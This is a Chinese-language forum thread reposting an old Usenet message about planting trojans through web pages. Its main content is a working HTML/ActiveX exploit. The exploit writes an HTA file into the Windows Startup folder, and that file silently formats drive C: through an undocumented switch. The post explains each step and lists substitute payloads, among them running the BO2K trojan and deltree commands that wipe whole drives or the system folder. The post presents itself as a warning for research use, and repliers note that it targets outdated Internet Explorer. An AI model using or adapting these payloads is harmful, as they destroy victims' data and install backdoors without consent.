广告广告
  加入我的最爱 设为首页 风格修改
首页 首尾
 手机版   订阅   地图  繁体 
您是第 3586 个阅读者
 
发表文章 发表投票 回覆文章
  可列印版   加为IE收藏   收藏主题   上一主题 | 下一主题   
阿豆仙 手机
数位造型
个人文章 个人相簿 个人日记 个人地图
初露锋芒
级别: 初露锋芒 该用户目前不上站
推文 x10 鲜花 x66
分享: 转寄此文章 Facebook Plurk Twitter 复制连结到剪贴簿 转换为繁体 转换为简体 载入图片
推文 x0
网页中安装的木马
网页中安装的木马
收录这篇文章只是提醒网友们,网际网路不是安全的环境,道高一尺,魔高一丈,任何技术一直在进步,很多人都在默默的研究和修补系统漏洞,当然也有很多「不懂事的人」在私底下做坏事〈只会拿着现成的工具到处攻击别人那种人〉? F在台湾的电子商务尚未成熟,还有一段好长的路要走,置身网路中也别为了一时之便,随意留下个人资料,在你遨游网路时也要时时刻刻做好安全措施喔。以下的文章千万不能拿去做坏事...
From: alerter.bbs@bbs.cs.nthu.edu.tw (小色男)
Newsgroups: tw.bbs.comp.security
Subject: Re: 装木马的技巧????
Date: 26 Sep 2000 08:51:56 GMT
Organization: 清华资讯(枫桥驿站)
网页安装木马其实也是有可能的

<HTML>
<header></header>
<BODY>
Hacking Your Computer .
<object id="scr" classid="clsid:06290BD5-48AA-11D2-8432-006008C3FBFC">
</object>
<SCRIPT>
scr.Reset();
scr.Path="C:\\WINDOWS\\Start Menu\\Programs\\启动\\hack.hta";
scr.Doc="
<SCRIPT>wsh.Run('start.exe /m FORMat c:/q /autotest /u');
alert('IMPORTANT : Windows is removing unused temporary files.');";
scr.write();

</BODY>
</HTML>

(懂HTML的人应该就看得出来其中精随)

现在我大概来解释其中几个项目所写的意思

scr.Path="C:\\WINDOWS\\Start Menu\\Programs\\启动\\hack.hta"

这一项就是指当你看到这网页它会写入到你的电脑启动目录底下,并命名为hack.hta

wsh.Run('start.exe /m FORMat c:/q /autotest /u');

通常要格式化硬碟都会先问你是否要执行,但其中的"/autotest"这项。

它是一个微软没有公开的功能,键入后FORMat的动作便会被强制执行。

这项中的/q /u是令系统不需要检查硬碟便会立即执行的指令。

最后start.exe再配合/m选项可以使FORMat的DOS-prompt视窗在执行的时候处于最小化的状态。

执行其他攻击指令的方法:

只要修改“start.exe /m FORMat c:/q /autotest /u”这一项便形。

start.exe /m FORMat c:/q /autotest /u

其中的“c:”可以换做其他的硬碟。

(path)\bo2k.exe

执行它电脑中的某个程式,如果你有传bo2k到它电脑中就可以使用此指令。

start.exe /m deltree /y a:\*.* c:\*.* d:\*.*

杀掉对方硬碟底下所有的档案。

start.exe /m deltree /y c:\windows\system\*.*

杀掉对方c:\windows\system\目录底下的所有档案。

后叙:

预防遭此手段的破坏就是到微软去更新你的浏览器。 表情

请勿拿来害人,只供给学术研究来使用!!! 这篇是由别的论坛里挖出来的!!


[ 此文章被mn1212在2005-03-14 01:37重新编辑 ]



献花 x0 回到顶端 [楼 主] From:广东省 | Posted:2005-03-11 23:22 |
klske
个人头像
个人文章 个人相簿 个人日记 个人地图
小人物
级别: 小人物 该用户目前不上站
推文 x0 鲜花 x3
分享: 转寄此文章 Facebook Plurk Twitter 复制连结到剪贴簿 转换为繁体 转换为简体 载入图片

我有时开启新网页时防毒软体就会说中病毒了,应该就是类似这种,真可怕>o<


知之为知之,不知为不知,是知也~
献花 x0 回到顶端 [1 楼] From:台湾中华电信 | Posted:2005-03-12 10:41 |
noid
数位造型
个人文章 个人相簿 个人日记 个人地图
初露锋芒
级别: 初露锋芒 该用户目前不上站
推文 x0 鲜花 x19
分享: 转寄此文章 Facebook Plurk Twitter 复制连结到剪贴簿 转换为繁体 转换为简体 载入图片

这是很久以前低东西啰~
现在应该都没有用了吧
(除非还有人在用IE4.0...)
不过还是谢谢啰~


献花 x0 回到顶端 [2 楼] From:局域网对方和您在同一内部网 | Posted:2005-03-12 15:50 |
SENFO 手机
个人头像
个人文章 个人相簿 个人日记 个人地图
初露锋芒
级别: 初露锋芒 该用户目前不上站
推文 x0 鲜花 x4
分享: 转寄此文章 Facebook Plurk Twitter 复制连结到剪贴簿 转换为繁体 转换为简体 载入图片

虽然说是以前安装木马的方法,但是学点FORMAT的参数也是不错的,说不定以后会用到~


献花 x0 回到顶端 [3 楼] From:台湾数位联合 | Posted:2005-03-14 14:50 |

首页  发表文章 发表投票 回覆文章
Powered by PHPWind v1.3.6
Copyright © 2003-04 PHPWind
Processed in 0.054580 second(s),query:16 Gzip disabled
本站由 瀛睿律师事务所 担任常年法律顾问 | 免责声明 | 本网站已依台湾网站内容分级规定处理 | 连络我们 | 访客留言